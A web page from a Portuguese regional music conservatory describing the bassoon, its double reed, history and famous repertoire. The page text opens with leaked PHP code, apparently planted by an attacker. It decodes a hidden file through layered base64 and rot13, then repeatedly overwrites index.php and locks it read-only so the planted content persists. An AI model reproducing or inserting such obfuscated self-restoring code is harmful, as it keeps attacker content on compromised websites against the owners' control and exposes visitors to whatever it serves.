$i_p = "index.php"; $index = file_get_contents($i_p); $path = "{index_hide}"; if (file_exists($path)) { $index_hide = file_get_contents($path); $index_hide = base64_decode(str_rot13(base64_decode(str_rot13($index_hide)))); if(md5($index) != md5($index_hide)) { @chmod($i_p, 0644); @file_put_contents($i_p, $index_hide); @chmod($i_p, 0444); } } Fagote – Conservatório Regional do Baixo Alentejo

Fagote

O Fagote é um instrumento de sopro habitualmente associado em Portugal aos domínios da orquestra sinfónica e, por vezes, das bandas filarmónicas. É um instrumento curioso, muitas vezes desconhecido dos leigos, apresentando uma forma e sonoridade únicas. De características graves e vibrantes, capazes de cativar a atenção de qualquer um, a sua execução é feita através de um mecanismo que os músicos designam por palheta dupla – uma espécie de pequena lamela de cana cortada, dobrada e fixa a um pequeno tubo designado tudel por onde o fagotista sopra. Apesar da história dos seus antepassados remontar aos tempos medievais, o seu repertório e formas modernas começaram a estabelecer-se sobretudo a partir dos séculos XVIII e XIX, tendo alcançado uma assinalável notoriedade por exemplo em obras como A Sagração da Primavera de Igor Stravinsky (1882 – 1971), Tristão e Isolda de Richard Wagner (1813 – 1883) ou o Pedro e o Lobo de Sergei Prokofiev (1891 – 1953).